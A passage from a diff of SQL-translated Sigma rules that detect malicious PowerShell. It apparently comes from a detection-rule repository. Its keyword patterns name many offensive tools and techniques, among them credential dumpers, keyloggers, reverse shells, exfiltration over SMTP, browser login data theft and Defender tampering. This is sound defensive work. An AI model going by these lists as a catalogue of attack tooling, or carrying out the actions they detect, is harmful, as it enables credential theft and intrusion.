LIKE '%Find-TrustedDocuments%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ADIDNS%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ApplicationHost%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ChromeDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ClipboardContents%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-FoxDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-GPPPassword%' ESCAPE '\\' OR ScriptBlockText LIKE 
'%Get-IndexedItem%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-KerberosAESKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Keystrokes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LSASecret%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-MachineAccountAttribute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-MachineAccountCreator%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-PassHashes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegAlwaysInstallElevated%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegAutoLogon%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteBootKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteCachedCredential%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteLocalAccountHash%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteLSAKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteMachineAccountHash%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteNLKMKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RickAstley%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Screenshot%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-SecurityPackages%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ServiceFilePermission%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ServicePermission%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ServiceUnquoted%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-SiteListPassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-System%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-TimedScreenshot%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-UnattendedInstallFile%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Unconstrained%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-USBKeystrokes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-VaultCredential%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-VulnAutoRun%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-VulnSchTask%' ESCAPE '\\' OR ScriptBlockText LIKE '%Grant-ADIDNSPermission%' ESCAPE '\\' OR ScriptBlockText LIKE '%Gupt-Backdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%HTTP-Login%' ESCAPE '\\' OR ScriptBlockText LIKE '%Install-ServiceBinary%' 
ESCAPE '\\' OR ScriptBlockText LIKE '%Install-SSP%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ADRecon%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ADSBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AgentSmith%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AllChecks%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ARPScan%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AzureHound%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BackdoorLNK%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BadPotato%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BetterSafetyKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BypassUAC%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Carbuncle%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Certify%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ConPtyShell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-CredentialInjection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DAFT%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DCSync%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DinvokeKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DllInjection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DNSUpdate%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DomainPasswordSpray%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DowngradeAccount%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-EgressCheck%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Eyewitness%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-FakeLogonScreen%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Farmer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Get-RBCD-Threaded%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Gopher%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Grouper%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-HandleKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ImpersonatedProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ImpersonateSystem%' ESCAPE '\\' OR ScriptBlockText LIKE 
'%Invoke-InteractiveSystemPowerShell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Internalmonologue%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Inveigh%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-InveighRelay%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-KrbRelay%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-LdapSignCheck%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Lockless%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MalSCCM%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Mimikatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Mimikittenz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MITM6%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NanoDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NetRipper%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NinjaCopy%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-OfficeScrape%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-OxidResolver%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-P0wnedshell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Paranoia%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PortScan%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PoshRatHttp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PostExfil%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellTCP%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellWMI%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PPLDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PsExec%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PSInject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PsUaCme%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ReflectivePEInjection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ReverseDNSLookup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Rubeus%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-RunAs%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SafetyKatz%' ESCAPE '\\' OR ScriptBlockText LIKE 
'%Invoke-SauronEye%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SCShell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Seatbelt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ServiceAbuse%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ShadowSpray%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Sharp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Shellcode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SMBScanner%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Snaffler%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Spoolsample%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SpraySinglePassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SSHCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-StandIn%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-StickyNotesExtract%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SystemCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Tasksbackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Tater%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Thunderfox%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ThunderStruck%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-TokenManipulation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Tokenvator%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-TotalExec%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UrbanBishop%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-VoiceTroll%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Whisker%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WinEnum%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-winPEAS%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WireTap%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WmiCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WMIExec%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WScriptBypassUAC%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Zerologon%' ESCAPE '\\' OR ScriptBlockText LIKE '%MailRaider%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-ADIDNSNode%' ESCAPE 
'\\' OR ScriptBlockText LIKE '%New-DNSRecordArray%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-HoneyHash%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-InMemoryModule%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-MachineAccount%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-SOASerialNumberArray%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-Minidump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Port-Scan%' ESCAPE '\\' OR ScriptBlockText LIKE '%PowerBreach%' ESCAPE '\\' OR ScriptBlockText LIKE '%powercat %' ESCAPE '\\' OR ScriptBlockText LIKE '%PowerUp%' ESCAPE '\\' OR ScriptBlockText LIKE '%PowerView%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-ADIDNSNode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-MachineAccount%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Update%' ESCAPE '\\' OR ScriptBlockText LIKE '%Rename-ADIDNSNode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Revoke-ADIDNSPermission%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-ADIDNSNode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-MacAttribute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-MachineAccountAttribute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-Wallpaper%' ESCAPE '\\' OR ScriptBlockText LIKE '%Show-TargetScreen%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-CaptureServer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-WebcamRecorder%' ESCAPE '\\' OR ScriptBlockText LIKE '%VolumeShadowCopyTools%' ESCAPE '\\') AND NOT (((ScriptBlockText LIKE '%Get-SystemDriveInfo%' ESCAPE '\\' OR ScriptBlockText LIKE '%C:\\\\ProgramData\\\\Amazon\\\\EC2-Windows\\\\Launch\\\\Module\\\\%' ESCAPE '\\'))))" ], - "filename": "posh_ps_psasyncshell.yml" + "filename": "posh_ps_malicious_commandlets.yml" }, { - "title": "Add New Windows Capability - ScriptBlock", - "id": "155c7fd5-47b4-49b2-bbeb-eb4fab335429", + "title": "Powershell Exfiltration Over SMTP", + "id": "9a7afa56-4762-43eb-807d-c3dc9ffe211b", "status": "experimental", - "description": "Detects usage of the \"Add-WindowsCapability\" cmdlet to add new windows capabilities. 
Notable capabilities could be \"OpenSSH\" and others.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.\nThe data may also be sent to an alternate network location from the main command and control server.\n", + "author": "frack113", "tags": [ - "attack.execution" + "attack.exfiltration", + "attack.t1048.003" ], "falsepositives": [ - "Legitimate usage of the capabilities by administartors or users. Filter accordingly" + "Legitimate script" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Add-WindowsCapability %' ESCAPE '\\' AND ScriptBlockText LIKE '%OpenSSH.%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ScriptBlockText LIKE '%Send-MailMessage%' ESCAPE '\\' AND NOT (ScriptBlockText LIKE '%CmdletsToExport%' ESCAPE '\\'))" ], - "filename": "posh_ps_add_windows_capability.yml" + "filename": "posh_ps_send_mailmessage.yml" }, { - "title": "Tamper Windows Defender Remove-MpPreference - ScriptBlockLogging", - "id": "ae2bdd58-0681-48ac-be7f-58ab4e593458", + "title": "Suspicious FromBase64String Usage On Gzip Archive - Ps Script", + "id": "df69cb1d-b891-4cd9-90c7-d617d90100ce", "status": "experimental", - "description": "Detects attempts to remove windows defender configuration using the 'MpPreference' cmdlet", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects attempts of decoding a base64 Gzip archive in a PowerShell script. 
This technique is often used as a method to load malicious content into memory afterward.", + "author": "frack113", + "falsepositives": [ + "Legitimate administrative script" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%FromBase64String%' ESCAPE '\\' AND ScriptBlockText LIKE '%MemoryStream%' ESCAPE '\\' AND ScriptBlockText LIKE '%H4sI%' ESCAPE '\\')" + ], + "filename": "posh_ps_frombase64string_archive.yml" + }, + { + "title": "Potential Active Directory Enumeration Using AD Module - PsScript", + "id": "9e620995-f2d8-4630-8430-4afd89f77604", + "status": "experimental", + "description": "Detects usage of the \"Import-Module\" cmdlet to load the \"Microsoft.ActiveDirectory.Management.dl\" DLL. Which is often used by attackers to perform AD enumeration.", + "author": "frack113, Nasreddine Bencherchali", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.reconnaissance", + "attack.discovery", + "attack.impact" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Legitimate use of the library for administrative activity" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Remove-MpPreference%' ESCAPE '\\' AND (ScriptBlockText LIKE '%-ControlledFolderAccessProtectedFolders %' ESCAPE '\\' OR ScriptBlockText LIKE '%-AttackSurfaceReductionRules\\_Ids %' ESCAPE '\\' OR ScriptBlockText LIKE '%-AttackSurfaceReductionRules\\_Actions %' ESCAPE '\\' OR ScriptBlockText LIKE '%-CheckForSignaturesBeforeRunningScan %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%Import-Module %' ESCAPE '\\' AND ScriptBlockText 
LIKE '%Microsoft.ActiveDirectory.Management.dll%' ESCAPE '\\') OR ScriptBlockText LIKE '%ipmo Microsoft.ActiveDirectory.Management.dll%' ESCAPE '\\'))" ], - "filename": "posh_ps_tamper_defender_remove_mppreference.yml" + "filename": "posh_ps_active_directory_module_dll_import.yml" }, { - "title": "Clearing Windows Console History", - "id": "bde47d4b-9987-405c-94c7-b080410e8ea7", + "title": "Access to Browser Login Data", + "id": "fc028194-969d-4122-8abe-0470d5b8f12f", "status": "test", - "description": "Identifies when a user attempts to clear console history. An adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion.", - "author": "Austin Songer @austinsonger", + "description": "Adversaries may acquire credentials from web browsers by reading files specific to the target browser.\nWeb browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future.\nWeb browsers typically store the credentials in an encrypted format within a credential store.\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1070", - "attack.t1070.003" + "attack.credential_access", + "attack.t1555.003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Clear-History%' ESCAPE '\\' OR ((ScriptBlockText LIKE '%Remove-Item%' ESCAPE '\\' OR ScriptBlockText LIKE '%rm%' ESCAPE '\\') AND (ScriptBlockText LIKE '%ConsoleHost\\_history.txt%' ESCAPE '\\' OR ScriptBlockText LIKE '%(Get-PSReadlineOption).HistorySavePath%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Copy-Item%' ESCAPE '\\' AND ScriptBlockText LIKE 
'%-Destination%' ESCAPE '\\' AND (ScriptBlockText LIKE '%\\\\Opera Software\\\\Opera Stable\\\\Login Data%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Mozilla\\\\Firefox\\\\Profiles%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Microsoft\\\\Edge\\\\User Data\\\\Default%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Login Data%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Login Data For Account%' ESCAPE '\\'))" ], - "filename": "posh_ps_clearing_windows_console_history.yml" + "filename": "posh_ps_access_to_browser_login_data.yml" }, { - "title": "Security Software Discovery by Powershell", - "id": "904e8e61-8edf-4350-b59c-b905fc8e810c", - "status": "test", - "description": "Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment.\nThis may include things such as firewall rules and anti-viru\n", + "title": "PowerShell WMI Win32_Product Install MSI", + "id": "91109523-17f0-4248-a800-f81d9e7c081d", + "status": "experimental", + "description": "Detects the execution of an MSI file using PowerShell and the WMI Win32_Product class", "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1518.001" + "attack.defense_evasion", + "attack.t1218.007" ], "falsepositives": [ "Unknown" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%get-process%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Description%' ESCAPE '\\' AND ScriptBlockText LIKE '%-like%' ESCAPE '\\' AND (ScriptBlockText LIKE '%\"%virus%\"%' ESCAPE '\\' OR ScriptBlockText LIKE '%\"%carbonblack%\"%' ESCAPE '\\' OR ScriptBlockText LIKE '%\"%defender%\"%' ESCAPE '\\' OR ScriptBlockText LIKE '%\"%cylance%\"%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' 
AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Invoke-CimMethod %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ClassName %' ESCAPE '\\' AND ScriptBlockText LIKE '%Win32\\_Product %' ESCAPE '\\' AND ScriptBlockText LIKE '%-MethodName %' ESCAPE '\\' AND ScriptBlockText LIKE '%.msi%' ESCAPE '\\')" ], - "filename": "posh_ps_security_software_discovery.yml" + "filename": "posh_ps_win32_product_install_msi.yml" }, { - "title": "PowerShell ADRecon Execution", - "id": "bf72941a-cba0-41ea-b18c-9aca3925690d", + "title": "PowerShell Remote Session Creation", + "id": "a0edd39f-a0c6-4c17-8141-261f958e8d8f", "status": "experimental", - "description": "Detects execution of ADRecon.ps1 for AD reconnaissance which has been reported to be actively used by FIN7", - "author": "Bhabesh Raj", + "description": "Adversaries may abuse PowerShell commands and scripts for execution.\nPowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system\n", + "author": "frack113", "tags": [ - "attack.discovery", "attack.execution", "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Legitimate administrative script" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Function Get-ADRExcelComOb%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ADRGPO%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ADRDomainController%' ESCAPE '\\' OR ScriptBlockText LIKE '%ADRecon-Report.xlsx%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-PSSession%' ESCAPE '\\' AND ScriptBlockText LIKE '%-ComputerName %' ESCAPE '\\')" ], - "filename": "posh_ps_adrecon_execution.yml" + "filename": 
"posh_ps_remote_session_creation.yml" }, { - "title": "Powershell Suspicious Win32_PnPEntity", - "id": "b26647de-4feb-4283-af6b-6117661283c5", - "status": "test", - "description": "Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.", + "title": "Potential In-Memory Execution Using Reflection.Assembly", + "id": "ddcd88cb-7f62-4ce5-86f9-1704190feb0a", + "status": "experimental", + "description": "Detects usage of \"Reflection.Assembly\" load functions to dynamically load assemblies in memory", "author": "frack113", + "falsepositives": [ + "Legitimate use of the library" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[Reflection.Assembly]::load%' ESCAPE '\\')" + ], + "filename": "posh_ps_dotnet_assembly_from_file.yml" + }, + { + "title": "PowerShell Credential Prompt", + "id": "ca8b77a9-d499-4095-b793-5d5f330d450e", + "status": "test", + "description": "Detects PowerShell calling a credential prompt", + "author": "John Lambert (idea), Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1120" + "attack.credential_access", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Admin script" + "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Win32\\_PnPEntity%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%PromptForCredential%' ESCAPE '\\')" ], - "filename": "posh_ps_susp_win32_pnpentity.yml" + "filename": "posh_ps_prompt_credentials.yml" }, { - "title": "Suspicious SSL Connection", - "id": 
"195626f3-5f1b-4403-93b7-e6cfd4d6a078", + "title": "Request A Single Ticket via PowerShell", + "id": "a861d835-af37-4930-bcd6-5b178bfb54df", "status": "test", - "description": "Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol.", + "description": "utilize native PowerShell Identity modules to query the domain to extract the Service Principal Names for a single computer.\nThis behavior is typically used during a kerberos or silver ticket attack.\nA successful execution will output the SPNs for the endpoint in question.\n", "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1573" + "attack.credential_access", + "attack.t1558.003" ], "falsepositives": [ - "Legitimate administrative script" + "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.Net.Security.SslStream%' ESCAPE '\\' AND ScriptBlockText LIKE '%Net.Security.RemoteCertificateValidationCallback%' ESCAPE '\\' AND ScriptBlockText LIKE '%.AuthenticateAsClient%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.IdentityModel.Tokens.KerberosRequestorSecurityToken%' ESCAPE '\\')" ], - "filename": "posh_ps_susp_ssl_keyword.yml" + "filename": "posh_ps_request_kerberos_ticket.yml" }, { - "title": "Potential WinAPI Calls Via PowerShell Scripts", - "id": "03d83090-8cba-44a0-b02f-0b756a050306", + "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell", + "id": "e54f5149-6ba3-49cf-b153-070d24679126", "status": "experimental", - "description": "Detects use of WinAPI Functions in PowerShell scripts", - "author": "Nikita Nazarov, oscd.community, Tim 
Shelton", + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ + "attack.defense_evasion", + "attack.t1027", "attack.execution", - "attack.t1059.001", - "attack.t1106" + "attack.t1059.001" ], "falsepositives": [ - "Carbon PowerShell Module (https://github.com/webmd-health-services/Carbon)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%AddSecurityPackage%' ESCAPE '\\' OR ScriptBlockText LIKE '%AdjustTokenPrivileges%' ESCAPE '\\' OR ScriptBlockText LIKE '%Advapi32%' ESCAPE '\\' OR ScriptBlockText LIKE '%CloseHandle%' ESCAPE '\\' OR ScriptBlockText LIKE '%CreateProcessWithToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%CreateRemoteThread%' ESCAPE '\\' OR ScriptBlockText LIKE '%CreateThread%' ESCAPE '\\' OR ScriptBlockText LIKE '%CreateUserThread%' ESCAPE '\\' OR ScriptBlockText LIKE '%DangerousGetHandle%' ESCAPE '\\' OR ScriptBlockText LIKE '%DuplicateTokenEx%' ESCAPE '\\' OR ScriptBlockText LIKE '%EnumerateSecurityPackages%' ESCAPE '\\' OR ScriptBlockText LIKE '%FreeLibrary%' ESCAPE '\\' OR ScriptBlockText LIKE '%GetDelegateForFunctionPointer%' ESCAPE '\\' OR ScriptBlockText LIKE '%GetLogonSessionData%' ESCAPE '\\' OR ScriptBlockText LIKE '%GetModuleHandle%' ESCAPE '\\' OR ScriptBlockText LIKE '%GetProcAddress%' ESCAPE '\\' OR ScriptBlockText LIKE '%GetProcessHandle%' ESCAPE '\\' OR ScriptBlockText LIKE '%GetTokenInformation%' ESCAPE '\\' OR ScriptBlockText LIKE '%ImpersonateLoggedOnUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%kernel32%' ESCAPE '\\' OR ScriptBlockText LIKE '%LoadLibrary%' ESCAPE '\\' OR ScriptBlockText LIKE '%memcpy%' ESCAPE '\\' OR ScriptBlockText LIKE '%MiniDumpWriteDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%msvcrt%' ESCAPE '\\' OR ScriptBlockText LIKE '%ntdll%' ESCAPE '\\' OR ScriptBlockText LIKE '%OpenDesktop%' 
